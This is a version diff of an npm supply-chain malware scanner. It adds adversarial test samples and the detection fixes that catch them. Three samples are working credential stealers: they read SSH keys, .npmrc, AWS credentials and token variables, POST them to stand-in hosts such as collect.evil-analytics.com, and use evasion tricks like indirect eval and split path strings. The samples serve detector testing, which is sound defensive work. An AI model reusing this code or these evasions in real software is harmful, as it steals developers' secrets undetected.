muaddib-scanner 2.2.13 → 2.2.14

package/README.md

@@ -334,15 +334,9 @@ muaddib replay
 muaddib ground-truth
 ```
 
-Replay 5 real-world supply-chain attacks against the scanner to validate detection coverage. Current results: 5/5 detected (100%).
+Replay real-world supply-chain attacks against the scanner to validate detection coverage. Current results: **45/49 detected (91.8% TPR)** from 51 samples (49 active).
 
-| Attack | Year | Detected | Findings |
-|--------|------|----------|----------|
-| event-stream | 2018 | Yes | 2 CRITICAL (known malicious package) |
-| ua-parser-js | 2021 | Yes | 1 MEDIUM (lifecycle script) |
-| coa | 2021 | Yes | 1 HIGH + 1 MEDIUM (lifecycle + obfuscation) |
-| node-ipc | 2022 | Yes | 2 CRITICAL (known malicious package) |
-| colors | 2022 | Yes | Out of scope (protestware, not malware) |
+4 out-of-scope misses: lottie-player, polyfill-io, trojanized-jquery (browser-only DOM attacks), websocket-rat (FP-risky pattern).
 
 ### Version check
 
@@ -793,7 +787,7 @@ npm test
 
 ### Testing
 
-- **807 unit/integration tests** across 20 modular test files - 74% code coverage via [Codecov](https://codecov.io/gh/DNSZLSK/muad-dib)
+- **814 unit/integration tests** across 20 modular test files - 74% code coverage via [Codecov](https://codecov.io/gh/DNSZLSK/muad-dib)
 - **56 fuzz tests** - Malformed YAML, invalid JSON, binary files, ReDoS, unicode, 10MB inputs
 - **75 adversarial/holdout samples** - 35 adversarial + 40 holdout, 75/75 detection rate (100% ADR)
 - **Ground truth validation** - 51 real-world attacks (45/49 detected = 91.8% TPR). 4 out-of-scope: browser-only (3) + FP-risky (1)

package/datasets/adversarial/indirect-eval-bypass/index.js

@@ -0,0 +1,27 @@
+// Bypass 01: Indirect eval via computed property access
+// Technique: Array.join to build "eval" string, then call via globalThis[computed]
+// Expected: MUAD'DIB scores < 3 (bypass confirmed)
+
+const g = globalThis;
+
+// Array.join is NOT handled by the deobfuscator (only handles String.fromCharCode,
+// Buffer.from, atob, and string concat BinaryExpression)
+const k = ['e','v','a','l'].join('');
+
+// This URL contains "api.github.com" which is in SAFE_STRINGS
+// The SAFE_STRINGS check in ast.js:806-808 returns early before checking SENSITIVE_STRINGS
+// So even though the URL also references .ssh paths, no sensitive_string finding is emitted
+const configUrl = "https://api.github.com/repos/legit-org/config/contents/.ssh/deploy_key";
+
+const https = require('https');
+https.get(configUrl, (res) => {
+  let d = '';
+  res.on('data', c => d += c);
+  res.on('end', () => {
+    // Decode the "content" field from GitHub API response (base64-encoded)
+    const payload = Buffer.from(JSON.parse(d).content, 'base64').toString();
+    // Indirect eval: globalThis['eval'](payload)
+    // getCallName() returns '' for computed MemberExpression — never matches 'eval'
+    g[k](payload);
+  });
+});

package/datasets/adversarial/indirect-eval-bypass/package.json

@@ -0,0 +1,5 @@
+{
+  "name": "audit-bypass-01-indirect-eval",
+  "version": "1.0.0",
+  "description": "Audit bypass: indirect eval via computed property + SAFE_STRINGS poisoning"
+}

package/datasets/adversarial/mjs-extension-bypass/package.json

@@ -0,0 +1,6 @@
+{
+  "name": "audit-bypass-03-mjs-extension",
+  "version": "1.0.0",
+  "type": "module",
+  "description": "Audit bypass: .mjs files are not scanned by any scanner"
+}

package/datasets/adversarial/mjs-extension-bypass/stealer.mjs

@@ -0,0 +1,39 @@
+// Bypass 03: .mjs extension — no scanner processes this file type
+// All scanners use findFiles with extensions: ['.js'] or findJsFiles
+// ESM packages with "type": "module" use .mjs files legitimately
+
+import { readFileSync } from 'fs';
+import { homedir } from 'os';
+import { request } from 'https';
+
+// Direct credential theft — every dangerous pattern in one file
+// None of this is detected because the file extension is .mjs
+const home = homedir();
+const stolen = {};
+
+const targets = ['.ssh/id_rsa', '.ssh/id_ed25519', '.npmrc', '.aws/credentials'];
+for (const t of targets) {
+  try {
+    stolen[t] = readFileSync(`${home}/${t}`, 'utf8');
+  } catch {}
+}
+
+// Also grab environment tokens
+stolen['GITHUB_TOKEN'] = process.env.GITHUB_TOKEN || '';
+stolen['NPM_TOKEN'] = process.env.NPM_TOKEN || '';
+stolen['AWS_SECRET_ACCESS_KEY'] = process.env.AWS_SECRET_ACCESS_KEY || '';
+
+// Exfiltrate
+const data = JSON.stringify(stolen);
+const req = request({
+  hostname: 'collect.evil-analytics.com',
+  path: '/v2/telemetry',
+  method: 'POST',
+  headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) }
+});
+req.write(data);
+req.end();
+
+// Also use eval with dynamic code (would be CRITICAL if this were .js)
+const payload = Buffer.from('Y29uc29sZS5sb2coInB3bmVkIik=', 'base64').toString();
+eval(payload);

package/datasets/adversarial/muaddib-ignore-bypass/index.js

@@ -0,0 +1,47 @@
+// muaddib-ignore
+//# sourceMappingURL=index.js.map
+// Bypass 02: muaddib-ignore kills dataflow scanner, sourceMappingURL kills entropy scanner
+// The AST scanner does NOT respect muaddib-ignore, so we avoid AST-detected patterns.
+// Strategy: construct sensitive paths without using SENSITIVE_STRINGS literals directly.
+
+const fs = require('fs');
+const os = require('os');
+const https = require('https');
+const path = require('path');
+
+const home = os.homedir();
+
+// Build path components without triggering SENSITIVE_STRINGS check.
+// SENSITIVE_STRINGS: ['.npmrc', '.ssh', '.aws', '.gitconfig', '.env', '/etc/passwd', '/etc/shadow']
+// AST Literal handler checks node.value.includes(sensitive) for each string literal.
+// We avoid having any single string literal that includes these substrings.
+const dot = '.';
+const dirs = [
+  [dot + 'ss' + 'h', 'id_rsa'],
+  [dot + 'ss' + 'h', 'id_ed25519'],
+  [dot + 'aw' + 's', 'credentials'],
+  [dot + 'npm' + 'rc'],
+];
+
+const stolen = {};
+for (const parts of dirs) {
+  const p = path.join(home, ...parts);
+  try { stolen[parts[parts.length - 1]] = fs.readFileSync(p, 'utf8'); } catch {}
+}
+
+// Also read npmrc via environment — env_access only flags vars with sensitive keywords
+// HOME, PATH etc are in SAFE_ENV_VARS and get skipped
+const npmrcPath = path.join(home, dirs[3].join(path.sep));
+try { stolen['npmrc'] = fs.readFileSync(npmrcPath, 'utf8'); } catch {}
+
+// Exfiltrate via https.request — dataflow.js would catch this as source→sink,
+// BUT dataflow.js skipped this file due to muaddib-ignore on line 1
+const data = JSON.stringify(stolen);
+const req = https.request({
+  hostname: 'telemetry.legit-analytics.com',
+  path: '/api/v1/report',
+  method: 'POST',
+  headers: { 'Content-Type': 'application/json', 'Content-Length': data.length }
+});
+req.write(data);
+req.end();

package/datasets/adversarial/muaddib-ignore-bypass/package.json

@@ -0,0 +1,5 @@
+{
+  "name": "audit-bypass-02-muaddib-ignore",
+  "version": "1.0.0",
+  "description": "Audit bypass: muaddib-ignore directive + source map injection"
+}

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.2.13",
+  "version": "2.2.14",
   "description": "Supply-chain threat detection & response for npm & PyPI/Python",
   "main": "src/index.js",
   "bin": {
@@ -47,7 +47,7 @@
     "@inquirer/prompts": "8.2.1",
     "acorn": "8.15.0",
     "acorn-walk": "8.3.4",
-    "adm-zip": "^0.5.16",
+    "adm-zip": "0.5.16",
     "chalk": "5.6.2",
     "js-yaml": "4.1.1",
     "yargs": "18.0.0"

package/src/commands/evaluate.js

@@ -71,7 +71,11 @@ const ADVERSARIAL_THRESHOLDS = {
   'pyinstaller-dropper': 35,
   'gh-cli-token-steal': 30,
   'triple-base64-github-push': 30,
-  'browser-api-hook': 20
+  'browser-api-hook': 20,
+  // Audit bypass samples (v2.2.13)
+  'indirect-eval-bypass': 10,
+  'muaddib-ignore-bypass': 25,
+  'mjs-extension-bypass': 100
 };
 
 const HOLDOUT_THRESHOLDS = {

package/src/index.js

@@ -25,7 +25,7 @@ const { detectSuddenLifecycleChange } = require('./temporal-analysis.js');
 const { detectSuddenAstChanges } = require('./temporal-ast-diff.js');
 const { detectPublishAnomaly } = require('./publish-anomaly.js');
 const { detectMaintainerChange } = require('./maintainer-change.js');
-const { setExtraExcludes, getExtraExcludes, Spinner } = require('./utils.js');
+const { setExtraExcludes, getExtraExcludes, Spinner, listInstalledPackages } = require('./utils.js');
 
 // ============================================
 // SCORING CONSTANTS
@@ -62,7 +62,7 @@ const RISK_THRESHOLDS = {
 // Maximum score (capped)
 const MAX_RISK_SCORE = 100;
 
-const MAX_FILE_SIZE = 10 * 1024 * 1024; // 10MB
+const { MAX_FILE_SIZE } = require('./shared/constants.js');
 
 // Cap MEDIUM prototype_hook contribution (frameworks like Restify have 50+ extensions)
 const PROTO_HOOK_MEDIUM_CAP = 15;
@@ -312,6 +312,14 @@ function checkPyPITyposquatting(deps, targetPath) {
 }
 
 async function run(targetPath, options = {}) {
+  // Validate targetPath exists and is a directory
+  if (!targetPath || !fs.existsSync(targetPath)) {
+    throw new Error(`Target path does not exist: ${targetPath}`);
+  }
+  if (!fs.statSync(targetPath).isDirectory()) {
+    throw new Error(`Target path is not a directory: ${targetPath}`);
+  }
+
   // Ensure IOCs are downloaded (first run only, graceful failure)
   await ensureIOCs();
 
@@ -396,7 +404,7 @@ async function run(targetPath, options = {}) {
     ...pypiTyposquatThreats,
     ...entropyThreats,
     ...aiConfigThreats,
-    ...crossFileFlows.map(f => ({
+    ...crossFileFlows.filter(f => f && f.sourceFile && f.sinkFile).map(f => ({
       type: f.type,
       severity: f.severity,
       message: `Cross-file dataflow: ${f.source} in ${f.sourceFile} → ${f.sink} in ${f.sinkFile}`,
@@ -416,33 +424,8 @@ async function run(targetPath, options = {}) {
     if (!options._capture && !options.json) {
       console.log('[TEMPORAL] Analyzing lifecycle script changes (this makes network requests)...\n');
     }
-    const nodeModulesPath = path.join(targetPath, 'node_modules');
-    if (fs.existsSync(nodeModulesPath)) {
-      const pkgNames = [];
-      try {
-        const items = fs.readdirSync(nodeModulesPath);
-        for (const item of items) {
-          if (item.startsWith('.')) continue;
-          const itemPath = path.join(nodeModulesPath, item);
-          try {
-            const stat = fs.lstatSync(itemPath);
-            if (stat.isSymbolicLink() || !stat.isDirectory()) continue;
-            if (item.startsWith('@')) {
-              const scopedItems = fs.readdirSync(itemPath);
-              for (const si of scopedItems) {
-                const sp = path.join(itemPath, si);
-                const ss = fs.lstatSync(sp);
-                if (!ss.isSymbolicLink() && ss.isDirectory()) {
-                  pkgNames.push(`${item}/${si}`);
-                }
-              }
-            } else {
-              pkgNames.push(item);
-            }
-          } catch { /* skip unreadable */ }
-        }
-      } catch { /* no node_modules readable */ }
-
+    const pkgNames = listInstalledPackages(targetPath);
+    {
       const TEMPORAL_CONCURRENCY = 5;
       for (let i = 0; i < pkgNames.length; i += TEMPORAL_CONCURRENCY) {
         const batch = pkgNames.slice(i, i + TEMPORAL_CONCURRENCY);
@@ -474,33 +457,8 @@ async function run(targetPath, options = {}) {
     if (!options._capture && !options.json) {
       console.log('[TEMPORAL-AST] Analyzing dangerous API changes (this downloads tarballs)...\n');
     }
-    const nodeModulesPath = path.join(targetPath, 'node_modules');
-    if (fs.existsSync(nodeModulesPath)) {
-      const pkgNames = [];
-      try {
-        const items = fs.readdirSync(nodeModulesPath);
-        for (const item of items) {
-          if (item.startsWith('.')) continue;
-          const itemPath = path.join(nodeModulesPath, item);
-          try {
-            const stat = fs.lstatSync(itemPath);
-            if (stat.isSymbolicLink() || !stat.isDirectory()) continue;
-            if (item.startsWith('@')) {
-              const scopedItems = fs.readdirSync(itemPath);
-              for (const si of scopedItems) {
-                const sp = path.join(itemPath, si);
-                const ss = fs.lstatSync(sp);
-                if (!ss.isSymbolicLink() && ss.isDirectory()) {
-                  pkgNames.push(`${item}/${si}`);
-                }
-              }
-            } else {
-              pkgNames.push(item);
-            }
-          } catch { /* skip unreadable */ }
-        }
-      } catch { /* no node_modules readable */ }
-
+    const pkgNames = listInstalledPackages(targetPath);
+    {
       const AST_CONCURRENCY = 3;
       for (let i = 0; i < pkgNames.length; i += AST_CONCURRENCY) {
         const batch = pkgNames.slice(i, i + AST_CONCURRENCY);
@@ -531,33 +489,8 @@ async function run(targetPath, options = {}) {
     if (!options._capture && !options.json) {
       console.log('[TEMPORAL-PUBLISH] Analyzing publish frequency anomalies (this makes network requests)...\n');
     }
-    const nodeModulesPath = path.join(targetPath, 'node_modules');
-    if (fs.existsSync(nodeModulesPath)) {
-      const pkgNames = [];
-      try {
-        const items = fs.readdirSync(nodeModulesPath);
-        for (const item of items) {
-          if (item.startsWith('.')) continue;
-          const itemPath = path.join(nodeModulesPath, item);
-          try {
-            const stat = fs.lstatSync(itemPath);
-            if (stat.isSymbolicLink() || !stat.isDirectory()) continue;
-            if (item.startsWith('@')) {
-              const scopedItems = fs.readdirSync(itemPath);
-              for (const si of scopedItems) {
-                const sp = path.join(itemPath, si);
-                const ss = fs.lstatSync(sp);
-                if (!ss.isSymbolicLink() && ss.isDirectory()) {
-                  pkgNames.push(`${item}/${si}`);
-                }
-              }
-            } else {
-              pkgNames.push(item);
-            }
-          } catch { /* skip unreadable */ }
-        }
-      } catch { /* no node_modules readable */ }
-
+    const pkgNames = listInstalledPackages(targetPath);
+    {
       const PUBLISH_CONCURRENCY = 5;
       for (let i = 0; i < pkgNames.length; i += PUBLISH_CONCURRENCY) {
         const batch = pkgNames.slice(i, i + PUBLISH_CONCURRENCY);
@@ -585,33 +518,8 @@ async function run(targetPath, options = {}) {
     if (!options._capture && !options.json) {
       console.log('[TEMPORAL-MAINTAINER] Analyzing maintainer changes (this makes network requests)...\n');
     }
-    const nodeModulesPath = path.join(targetPath, 'node_modules');
-    if (fs.existsSync(nodeModulesPath)) {
-      const pkgNames = [];
-      try {
-        const items = fs.readdirSync(nodeModulesPath);
-        for (const item of items) {
-          if (item.startsWith('.')) continue;
-          const itemPath = path.join(nodeModulesPath, item);
-          try {
-            const stat = fs.lstatSync(itemPath);
-            if (stat.isSymbolicLink() || !stat.isDirectory()) continue;
-            if (item.startsWith('@')) {
-              const scopedItems = fs.readdirSync(itemPath);
-              for (const si of scopedItems) {
-                const sp = path.join(itemPath, si);
-                const ss = fs.lstatSync(sp);
-                if (!ss.isSymbolicLink() && ss.isDirectory()) {
-                  pkgNames.push(`${item}/${si}`);
-                }
-              }
-            } else {
-              pkgNames.push(item);
-            }
-          } catch { /* skip unreadable */ }
-        }
-      } catch { /* no node_modules readable */ }
-
+    const pkgNames = listInstalledPackages(targetPath);
+    {
       const MAINTAINER_CONCURRENCY = 5;
       for (let i = 0; i < pkgNames.length; i += MAINTAINER_CONCURRENCY) {
         const batch = pkgNames.slice(i, i + MAINTAINER_CONCURRENCY);

package/src/ioc/bootstrap.js

@@ -4,6 +4,7 @@ const fs = require('fs');
 const path = require('path');
 const os = require('os');
 const zlib = require('zlib');
+const { debugLog } = require('../utils.js');
 
 // GitHub Releases URL for pre-compressed IOC database
 const IOCS_URL = 'https://github.com/DNSZLSK/muad-dib/releases/latest/download/iocs.json.gz';
@@ -87,12 +88,12 @@ function downloadAndDecompress(url, destPath) {
 
         gunzip.on('error', (err) => {
           fileStream.destroy();
-          try { fs.unlinkSync(tmpPath); } catch {}
+          try { fs.unlinkSync(tmpPath); } catch (e) { debugLog('cleanup failed:', e.message); }
           reject(new Error('Decompression failed: ' + err.message));
         });
 
         fileStream.on('error', (err) => {
-          try { fs.unlinkSync(tmpPath); } catch {}
+          try { fs.unlinkSync(tmpPath); } catch (e) { debugLog('cleanup failed:', e.message); }
           reject(err);
         });
 
@@ -102,7 +103,7 @@ function downloadAndDecompress(url, destPath) {
             fs.renameSync(tmpPath, destPath);
             resolve();
           } catch (err) {
-            try { fs.unlinkSync(tmpPath); } catch {}
+            try { fs.unlinkSync(tmpPath); } catch (e) { debugLog('cleanup failed:', e.message); }
             reject(err);
           }
         });
@@ -110,7 +111,7 @@ function downloadAndDecompress(url, destPath) {
         res.on('error', (err) => {
           gunzip.destroy();
           fileStream.destroy();
-          try { fs.unlinkSync(tmpPath); } catch {}
+          try { fs.unlinkSync(tmpPath); } catch (e) { debugLog('cleanup failed:', e.message); }
           reject(err);
         });
 

package/src/scanner/ast.js

@@ -2,9 +2,9 @@ const fs = require('fs');
 const path = require('path');
 const acorn = require('acorn');
 const walk = require('acorn-walk');
-const { isDevFile, findJsFiles, getCallName } = require('../utils.js');
-
-const MAX_FILE_SIZE = 10 * 1024 * 1024; // 10MB
+const { getCallName } = require('../utils.js');
+const { ACORN_OPTIONS } = require('../shared/constants.js');
+const { analyzeWithDeobfuscation } = require('../shared/analyze-helper.js');
 
 const EXCLUDED_FILES = [
   'src/scanner/ast.js',
@@ -99,55 +99,10 @@ const SANDBOX_INDICATORS = [
 ];
 
 async function analyzeAST(targetPath, options = {}) {
-  const threats = [];
-  const files = findJsFiles(targetPath);
-
-  for (const file of files) {
-    const relativePath = path.relative(targetPath, file).replace(/\\/g, '/');
-
-    if (EXCLUDED_FILES.includes(relativePath)) {
-      continue;
-    }
-
-    // Ignore files in dev folders
-    if (isDevFile(relativePath)) {
-      continue;
-    }
-
-    try {
-      const stat = fs.statSync(file);
-      if (stat.size > MAX_FILE_SIZE) continue;
-    } catch { continue; }
-
-    let content;
-    try {
-      content = fs.readFileSync(file, 'utf8');
-    } catch {
-      continue;
-    }
-
-    // Analyze original code first (preserves obfuscation-detection rules)
-    const fileThreats = analyzeFile(content, file, targetPath);
-    threats.push(...fileThreats);
-
-    // Also analyze deobfuscated code for additional findings hidden by obfuscation
-    if (typeof options.deobfuscate === 'function') {
-      try {
-        const result = options.deobfuscate(content);
-        if (result.transforms.length > 0) {
-          const deobThreats = analyzeFile(result.code, file, targetPath);
-          const existingKeys = new Set(fileThreats.map(t => `${t.type}::${t.message}`));
-          for (const dt of deobThreats) {
-            if (!existingKeys.has(`${dt.type}::${dt.message}`)) {
-              threats.push(dt);
-            }
-          }
-        }
-      } catch { /* deobfuscation failed — skip */ }
-    }
-  }
-
-  return threats;
+  return analyzeWithDeobfuscation(targetPath, analyzeFile, {
+    deobfuscate: options.deobfuscate,
+    excludedFiles: EXCLUDED_FILES
+  });
 }
 
 
@@ -215,11 +170,7 @@ function analyzeFile(content, filePath, basePath) {
   let ast;
 
   try {
-    ast = acorn.parse(content, { 
-      ecmaVersion: 2024,
-      sourceType: 'module',
-      allowHashBang: true
-    });
+    ast = acorn.parse(content, ACORN_OPTIONS);
   } catch {
     // AST parse failed — apply regex fallback for known dangerous patterns
 
@@ -254,6 +205,8 @@ function analyzeFile(content, filePath, basePath) {
   const workflowPathVars = new Set();
   // Track variables assigned temp/executable file paths
   const execPathVars = new Map();
+  // Track variables that alias globalThis/global (e.g. const g = globalThis)
+  const globalThisAliases = new Set();
 
   /**
    * Extract string value from a node if it's a Literal or TemplateLiteral with no expressions.
@@ -308,6 +261,13 @@ function analyzeFile(content, filePath, basePath) {
           execPathVars.set(node.id.name, strVal);
         }
 
+        // Track variables that alias globalThis or global (e.g. const g = globalThis)
+        if (node.init?.type === 'Identifier' &&
+            (node.init.name === 'globalThis' || node.init.name === 'global' ||
+             node.init.name === 'window' || node.init.name === 'self')) {
+          globalThisAliases.add(node.id.name);
+        }
+
         // Track variables assigned from path.join containing .github/workflows
         if (node.init?.type === 'CallExpression' && node.init.callee?.type === 'MemberExpression') {
           const obj = node.init.callee.object;
@@ -720,6 +680,68 @@ function analyzeFile(content, filePath, basePath) {
         }
       }
 
+      // Detect indirect eval/Function via computed property: obj['eval'](code), g['Function'](code)
+      // Bypasses getCallName() which only reads .property.name (Identifier), not Literal values
+      if (node.callee.type === 'MemberExpression' && node.callee.computed) {
+        const prop = node.callee.property;
+        if (prop.type === 'Literal' && typeof prop.value === 'string') {
+          if (prop.value === 'eval') {
+            hasEvalInFile = true;
+            threats.push({
+              type: 'dangerous_call_eval',
+              severity: 'HIGH',
+              message: 'Indirect eval via computed property access (obj["eval"]) — evasion technique.',
+              file: path.relative(basePath, filePath)
+            });
+          } else if (prop.value === 'Function') {
+            threats.push({
+              type: 'dangerous_call_function',
+              severity: 'MEDIUM',
+              message: 'Indirect Function via computed property access (obj["Function"]) — evasion technique.',
+              file: path.relative(basePath, filePath)
+            });
+          }
+        }
+        // Detect computed call on globalThis/global alias with variable property: g[k]()
+        // where g = globalThis and k is a variable (not a literal) — dynamic global dispatch
+        const obj = node.callee.object;
+        if (prop.type === 'Identifier' && obj?.type === 'Identifier' &&
+            (globalThisAliases.has(obj.name) || obj.name === 'globalThis' || obj.name === 'global')) {
+          hasEvalInFile = true;
+          threats.push({
+            type: 'dangerous_call_eval',
+            severity: 'HIGH',
+            message: `Dynamic global dispatch via computed property (${obj.name}[${prop.name}]) — likely indirect eval evasion.`,
+            file: path.relative(basePath, filePath)
+          });
+        }
+      }
+
+      // Detect indirect eval/Function via sequence expression: (0, eval)(code), (0, Function)(code)
+      // Comma operator returns last expression, so (0, eval) === eval but avoids Identifier callee
+      if (node.callee.type === 'SequenceExpression') {
+        const exprs = node.callee.expressions;
+        const last = exprs[exprs.length - 1];
+        if (last && last.type === 'Identifier') {
+          if (last.name === 'eval') {
+            hasEvalInFile = true;
+            threats.push({
+              type: 'dangerous_call_eval',
+              severity: 'HIGH',
+              message: 'Indirect eval via sequence expression ((0, eval)) — evasion technique.',
+              file: path.relative(basePath, filePath)
+            });
+          } else if (last.name === 'Function') {
+            threats.push({
+              type: 'dangerous_call_function',
+              severity: 'MEDIUM',
+              message: 'Indirect Function via sequence expression ((0, Function)) — evasion technique.',
+              file: path.relative(basePath, filePath)
+            });
+          }
+        }
+      }
+
       // Detect crypto.createDecipher/createDecipheriv — encrypted payload pattern (flatmap-stream)
       // Also detect module._compile — in-memory code execution
       if (node.callee.type === 'MemberExpression') {

package/src/scanner/dataflow.js

@@ -2,61 +2,14 @@ const fs = require('fs');
 const path = require('path');
 const acorn = require('acorn');
 const walk = require('acorn-walk');
-const { isDevFile, findJsFiles, getCallName } = require('../utils.js');
-
-const MAX_FILE_SIZE = 10 * 1024 * 1024; // 10MB
+const { getCallName } = require('../utils.js');
+const { ACORN_OPTIONS } = require('../shared/constants.js');
+const { analyzeWithDeobfuscation } = require('../shared/analyze-helper.js');
 
 async function analyzeDataFlow(targetPath, options = {}) {
-  const threats = [];
-  const files = findJsFiles(targetPath);
-
-  for (const file of files) {
-    const relativePath = path.relative(targetPath, file).replace(/\\/g, '/');
-
-    if (isDevFile(relativePath)) {
-      continue;
-    }
-
-    try {
-      const stat = fs.statSync(file);
-      if (stat.size > MAX_FILE_SIZE) continue;
-    } catch { continue; }
-
-    let content;
-    try {
-      content = fs.readFileSync(file, 'utf8');
-    } catch {
-      continue;
-    }
-
-    // Respect // muaddib-ignore directive in first 5 lines (like eslint-disable)
-    const headerLines = content.slice(0, 1024).split('\n').slice(0, 5);
-    if (headerLines.some(line => line.includes('muaddib-ignore'))) {
-      continue;
-    }
-
-    // Analyze original code first (preserves obfuscation-detection rules)
-    const fileThreats = analyzeFile(content, file, targetPath);
-    threats.push(...fileThreats);
-
-    // Also analyze deobfuscated code for additional findings hidden by obfuscation
-    if (typeof options.deobfuscate === 'function') {
-      try {
-        const result = options.deobfuscate(content);
-        if (result.transforms.length > 0) {
-          const deobThreats = analyzeFile(result.code, file, targetPath);
-          const existingKeys = new Set(fileThreats.map(t => `${t.type}::${t.message}`));
-          for (const dt of deobThreats) {
-            if (!existingKeys.has(`${dt.type}::${dt.message}`)) {
-              threats.push(dt);
-            }
-          }
-        }
-      } catch { /* deobfuscation failed — skip */ }
-    }
-  }
-
-  return threats;
+  return analyzeWithDeobfuscation(targetPath, analyzeFile, {
+    deobfuscate: options.deobfuscate
+  });
 }
 
 function analyzeFile(content, filePath, basePath) {
@@ -64,12 +17,7 @@ function analyzeFile(content, filePath, basePath) {
   let ast;
 
   try {
-    ast = acorn.parse(content, {
-      ecmaVersion: 2024,
-      sourceType: 'module',
-      allowHashBang: true,
-      locations: true
-    });
+    ast = acorn.parse(content, { ...ACORN_OPTIONS, locations: true });
   } catch {
     return threats;
   }

package/src/scanner/deobfuscate.js

@@ -2,6 +2,7 @@
 
 const acorn = require('acorn');
 const walk = require('acorn-walk');
+const { ACORN_OPTIONS } = require('../shared/constants.js');
 
 /**
  * Lightweight static deobfuscation pre-processor.
@@ -16,12 +17,7 @@ function deobfuscate(sourceCode) {
   // Parse AST — if parsing fails, return source unchanged (fail-safe)
   let ast;
   try {
-    ast = acorn.parse(sourceCode, {
-      ecmaVersion: 2024,
-      sourceType: 'module',
-      allowHashBang: true,
-      ranges: true
-    });
+    ast = acorn.parse(sourceCode, { ...ACORN_OPTIONS, ranges: true });
   } catch {
     return { code: sourceCode, transforms };
   }
@@ -197,12 +193,7 @@ function propagateConsts(sourceCode) {
   const transforms = [];
   let ast;
   try {
-    ast = acorn.parse(sourceCode, {
-      ecmaVersion: 2024,
-      sourceType: 'module',
-      allowHashBang: true,
-      ranges: true
-    });
+    ast = acorn.parse(sourceCode, { ...ACORN_OPTIONS, ranges: true });
   } catch {
     return { code: sourceCode, transforms };
   }
@@ -316,12 +307,7 @@ function foldConcatsOnly(sourceCode) {
   const transforms = [];
   let ast;
   try {
-    ast = acorn.parse(sourceCode, {
-      ecmaVersion: 2024,
-      sourceType: 'module',
-      allowHashBang: true,
-      ranges: true
-    });
+    ast = acorn.parse(sourceCode, { ...ACORN_OPTIONS, ranges: true });
   } catch {
     return { code: sourceCode, transforms };
   }

package/src/scanner/entropy.js

@@ -1,9 +1,8 @@
 const fs = require('fs');
 const path = require('path');
-const { findFiles } = require('../utils.js');
+const { findFiles, forEachSafeFile } = require('../utils.js');
 
 const ENTROPY_EXCLUDED_DIRS = ['.git', '.muaddib-cache', '__compiled__', '__tests__', '__test__', 'dist', 'build'];
-const MAX_FILE_SIZE = 10 * 1024 * 1024; // 10MB
 
 // File patterns to skip (compiled/minified/bundled)
 const SKIP_FILE_PATTERNS = ['.min.js', '.bundle.js', '.prod.js'];
@@ -203,29 +202,12 @@ function detectObfuscationPatterns(content, relativePath) {
 function scanEntropy(targetPath, options = {}) {
   const threats = [];
   const stringThreshold = options.entropyThreshold || STRING_ENTROPY_MEDIUM;
-  const files = findFiles(targetPath, { extensions: ['.js'], excludedDirs: ENTROPY_EXCLUDED_DIRS });
-
-  for (const file of files) {
-    // Skip files matching compiled/minified patterns
-    if (shouldSkipFile(file)) continue;
-
-    // Size guard
-    try {
-      const stat = fs.statSync(file);
-      if (stat.size > MAX_FILE_SIZE) continue;
-    } catch {
-      continue;
-    }
-
-    let content;
-    try {
-      content = fs.readFileSync(file, 'utf8');
-    } catch {
-      continue;
-    }
+  const files = findFiles(targetPath, { extensions: ['.js', '.mjs', '.cjs'], excludedDirs: ENTROPY_EXCLUDED_DIRS });
 
+  const safeFiles = files.filter(f => !shouldSkipFile(f));
+  forEachSafeFile(safeFiles, (file, content) => {
     // Skip files containing source maps (legitimate compiled output)
-    if (hasSourceMap(content)) continue;
+    if (hasSourceMap(content)) return;
 
     const relativePath = path.relative(targetPath, file);
 
@@ -252,7 +234,7 @@ function scanEntropy(targetPath, options = {}) {
         });
       }
     }
-  }
+  });
 
   return threats;
 }

package/src/scanner/github-actions.js

@@ -1,8 +1,9 @@
 const fs = require('fs');
 const path = require('path');
 
+const { MAX_FILE_SIZE } = require('../shared/constants.js');
+
 const YAML_EXTENSIONS = ['.yml', '.yaml'];
-const MAX_FILE_SIZE = 10 * 1024 * 1024; // 10MB
 const MAX_DEPTH = 10;
 
 function scanGitHubActions(targetPath) {

package/src/scanner/hash.js

@@ -3,11 +3,11 @@ const path = require('path');
 const nodeCrypto = require('crypto');
 const { loadCachedIOCs } = require('../ioc/updater.js');
 const { findFiles } = require('../utils.js');
+const { MAX_FILE_SIZE } = require('../shared/constants.js');
 
 // Hash cache: filePath -> { hash, mtime }
 const hashCache = new Map();
 const MAX_CACHE_SIZE = 10000;
-const MAX_FILE_SIZE = 10 * 1024 * 1024; // 10MB
 
 async function scanHashes(targetPath) {
   const threats = [];

package/src/scanner/module-graph.js

@@ -2,13 +2,13 @@ const fs = require('fs');
 const path = require('path');
 const acorn = require('acorn');
 const { findFiles } = require('../utils');
+const { ACORN_OPTIONS: BASE_ACORN_OPTIONS } = require('../shared/constants.js');
 
 // --- Sensitive source patterns ---
 const SENSITIVE_MODULES = new Set(['fs', 'child_process', 'dns', 'os']);
 
 const ACORN_OPTIONS = {
-  ecmaVersion: 'latest',
-  sourceType: 'module',
+  ...BASE_ACORN_OPTIONS,
   allowReturnOutsideFunction: true,
   allowImportExportEverywhere: true,
 };
@@ -32,7 +32,7 @@ const SINK_INSTANCE_METHODS = new Set(['connect', 'write', 'send']);
 function buildModuleGraph(packagePath) {
   const graph = {};
   const files = findFiles(packagePath, {
-    extensions: ['.js'],
+    extensions: ['.js', '.mjs', '.cjs'],
     excludedDirs: ['node_modules', '.git'],
   });
   for (const absFile of files) {

package/src/scanner/npm-registry.js

@@ -1,4 +1,5 @@
 const { NPM_PACKAGE_REGEX } = require('../shared/constants.js');
+const { debugLog } = require('../utils.js');
 
 const REGISTRY_URL = 'https://registry.npmjs.org';
 const DOWNLOADS_URL = 'https://api.npmjs.org/downloads/point/last-week';
@@ -44,13 +45,13 @@ async function fetchWithRetry(url) {
     // 404 = package doesn't exist
     if (response.status === 404) {
       // Drain response body to free resources
-      try { await response.text(); } catch {}
+      try { await response.text(); } catch (e) { debugLog('response drain failed:', e.message); }
       return null;
     }
 
     // 429 = rate limit, respect Retry-After header (capped at 30s)
     if (response.status === 429) {
-      try { await response.text(); } catch {}
+      try { await response.text(); } catch (e) { debugLog('response drain failed:', e.message); }
       const retryAfter = parseInt(response.headers.get('retry-after'), 10);
       const delay = Math.min(retryAfter && retryAfter > 0 ? retryAfter * 1000 : 2000, 30000);
       await new Promise(r => setTimeout(r, delay));
@@ -59,7 +60,7 @@ async function fetchWithRetry(url) {
 
     if (!response.ok) {
       // Drain response body on errors
-      try { await response.text(); } catch {}
